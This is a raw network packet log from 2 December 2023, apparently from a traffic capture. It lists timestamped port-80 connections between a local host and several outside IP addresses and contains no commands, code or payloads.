                                                                          Dec 2, 2023 18:48:52.074996948 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.075056076 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.075373888 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.075388908 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.075431108 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.305774927 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.305797100 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.305864096 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.306391001 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.306436062 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.306478977 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.306785107 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.306854010 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.306896925 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.307353973 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.307369947 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.307419062 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.308024883 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.308057070 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.308100939 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.308634043 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.308649063 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.308691025 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.309144020 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309159040 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309216022 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.309474945 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309592009 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309629917 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309636116 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.309662104 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309700966 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.309726000 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309740067 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.309776068 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.525772095 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.525798082 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.525842905 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.526010990 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526030064 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526072025 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.526401043 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526418924 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526459932 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.526797056 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526861906 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.526902914 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.527179956 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527196884 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527239084 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.527472973 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527514935 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527565956 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.527870893 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527890921 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.527935028 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.528253078 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528284073 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528322935 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.528798103 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528815031 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528856039 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.528950930 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.528965950 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529002905 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.529360056 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529381037 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529438019 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.529726028 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529742956 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.529774904 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.530030966 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530061960 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530100107 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.530462980 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530481100 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530519009 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.530857086 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530878067 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.530981064 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.531371117 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.531388998 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.531435013 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.531845093 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.531862020 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.531897068 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.532440901 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.532485008 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.532530069 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.533144951 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.533164978 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.533205032 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.533732891 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.533756018 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.533793926 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.746042013 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746062994 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746165037 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.746212006 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746231079 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746296883 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.746634960 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746651888 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746694088 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.746942043 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.746977091 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747018099 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.747174978 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747251987 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747288942 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.747577906 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747649908 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.747689009 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.747951031 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748012066 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748050928 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.748341084 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748357058 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748394012 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.748703003 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748718023 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.748769999 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:49:35.737701893 CET4974380192.168.2.566.29.155.54
                                                                          Dec 2, 2023 18:49:35.738122940 CET4974380192.168.2.566.29.155.54
                                                                          Dec 2, 2023 18:49:35.910340071 CET804974366.29.155.54192.168.2.5
                                                                          Dec 2, 2023 18:49:41.754828930 CET4974480192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:41.853600979 CET804974434.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:41.853784084 CET4974480192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:41.854471922 CET4974480192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:41.953182936 CET804974434.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:42.141279936 CET804974434.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:42.141297102 CET804974434.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:42.141357899 CET4974480192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:43.366810083 CET4974480192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:44.386677027 CET4974580192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:44.486038923 CET804974534.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:44.486152887 CET4974580192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:44.486354113 CET4974580192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:44.585490942 CET804974534.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:44.772815943 CET804974534.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:44.775960922 CET804974534.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:44.775981903 CET804974534.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:44.776046991 CET4974580192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:44.776134014 CET4974580192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:45.991556883 CET4974580192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:47.007611990 CET4974680192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:47.106493950 CET804974634.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:47.106612921 CET4974680192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:47.106955051 CET4974680192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:47.205741882 CET804974634.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:47.205761909 CET804974634.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:47.949619055 CET804974634.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:47.949656010 CET804974634.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:47.949740887 CET4974680192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:48.616621017 CET4974680192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:49.632674932 CET4974780192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:49.731714964 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:49.731997013 CET4974780192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:49.732218027 CET4974780192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:49.831255913 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:50.019200087 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:50.019222975 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:50.019234896 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:50.019247055 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:50.019258976 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:50.019270897 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:50.019541979 CET4974780192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:50.019541979 CET4974780192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:50.020248890 CET4974780192.168.2.534.117.26.57
                                                                          Dec 2, 2023 18:49:50.118997097 CET804974734.117.26.57192.168.2.5
                                                                          Dec 2, 2023 18:49:55.276540995 CET4974880192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:55.480822086 CET804974881.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:49:55.481144905 CET4974880192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:55.481358051 CET4974880192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:55.685534954 CET804974881.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:49:55.686580896 CET804974881.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:49:55.686599970 CET804974881.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:49:55.686696053 CET4974880192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:56.991640091 CET4974880192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:58.007889032 CET4974980192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:58.212162971 CET804974981.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:49:58.212275982 CET4974980192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:58.212608099 CET4974980192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:58.416759014 CET804974981.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:49:58.418216944 CET804974981.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:49:58.418236971 CET804974981.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:49:58.418364048 CET4974980192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:49:59.725892067 CET4974980192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:00.741890907 CET4975080192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:00.942117929 CET804975081.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:00.942293882 CET4975080192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:00.942697048 CET4975080192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:01.143404007 CET804975081.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:01.144784927 CET804975081.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:01.144803047 CET804975081.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:01.144954920 CET4975080192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:02.444803953 CET4975080192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:03.461047888 CET4975180192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:03.661465883 CET804975181.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:03.661684036 CET4975180192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:03.661873102 CET4975180192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:03.862060070 CET804975181.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:03.863384008 CET804975181.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:03.863406897 CET804975181.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:03.863529921 CET4975180192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:03.863724947 CET4975180192.168.2.581.169.145.70
                                                                          Dec 2, 2023 18:50:04.063910007 CET804975181.169.145.70192.168.2.5
                                                                          Dec 2, 2023 18:50:09.448178053 CET4975280192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:09.669711113 CET804975285.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:09.669850111 CET4975280192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:09.670131922 CET4975280192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:09.891524076 CET804975285.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:09.967868090 CET804975285.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:09.968029022 CET4975280192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:11.179085970 CET4975280192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:12.195688009 CET4975380192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:12.418904066 CET804975385.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:12.419169903 CET4975380192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:12.419315100 CET4975380192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:12.642458916 CET804975385.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:12.704992056 CET804975385.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:12.705059052 CET4975380192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:13.967195034 CET4975380192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:15.484616995 CET4975480192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:15.707950115 CET804975485.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:15.708266973 CET4975480192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:15.720549107 CET4975480192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:15.943995953 CET804975485.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:16.004369974 CET804975485.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:16.005774021 CET804975485.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:16.005934954 CET4975480192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:17.225817919 CET4975480192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:18.241780996 CET4975580192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:18.465183020 CET804975585.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:18.465328932 CET4975580192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:18.465579987 CET4975580192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:18.691795111 CET804975585.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:18.692107916 CET4975580192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:18.692169905 CET4975580192.168.2.585.159.66.93
                                                                          Dec 2, 2023 18:50:18.915373087 CET804975585.159.66.93192.168.2.5
                                                                          Dec 2, 2023 18:50:24.103306055 CET4975680192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:24.291434050 CET8049756162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:24.291508913 CET4975680192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:24.291728020 CET4975680192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:24.479593039 CET8049756162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:24.491022110 CET8049756162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:24.491113901 CET8049756162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:24.491184950 CET4975680192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:25.803906918 CET4975680192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:26.820628881 CET4975780192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:27.010183096 CET8049757162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:27.010380030 CET4975780192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:27.010592937 CET4975780192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:27.199685097 CET8049757162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:27.211474895 CET8049757162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:27.211496115 CET8049757162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:27.211572886 CET4975780192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:28.522672892 CET4975780192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:29.538775921 CET4975880192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:29.727027893 CET8049758162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:29.727288008 CET4975880192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:29.727535963 CET4975880192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:29.915649891 CET8049758162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:29.926692009 CET8049758162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:29.926776886 CET8049758162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:29.926937103 CET4975880192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:31.241524935 CET4975880192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:32.985141039 CET4975980192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:33.175029039 CET8049759162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:33.175179958 CET4975980192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:33.175403118 CET4975980192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:33.365386009 CET8049759162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:33.390032053 CET8049759162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:33.390292883 CET8049759162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:33.390388966 CET4975980192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:33.390444994 CET4975980192.168.2.5162.241.252.161
                                                                          Dec 2, 2023 18:50:33.580653906 CET8049759162.241.252.161192.168.2.5
                                                                          Dec 2, 2023 18:50:39.034032106 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:39.219821930 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:39.219948053 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:39.220145941 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:39.405096054 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391369104 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391390085 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391403913 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391419888 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391433001 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391446114 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391460896 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391469002 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.391474962 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391597033 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391609907 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.391630888 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.391652107 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.578263044 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578291893 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578305960 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578321934 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578335047 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.578347921 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578370094 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578370094 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.578387022 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578403950 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578413963 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.578445911 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.578536034 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578560114 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578592062 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578597069 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.578608036 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578643084 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.578704119 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578752995 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578788042 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.578860998 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578921080 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.578957081 CET4976080192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:40.579087019 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:40.579109907 CET8049760185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:55.189887047 CET4976480192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:56.413702965 CET4976480192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:57.439064980 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:57.538281918 CET804976534.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:57.538682938 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:57.538683891 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:57.637918949 CET804976534.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:57.831825018 CET804976534.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:57.831876993 CET804976534.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:57.834918022 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:59.053812027 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:00.069958925 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:00.168982029 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.169183016 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:00.169476986 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:00.268402100 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.268430948 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.461985111 CET804976634.120.55.112192.168.2.5
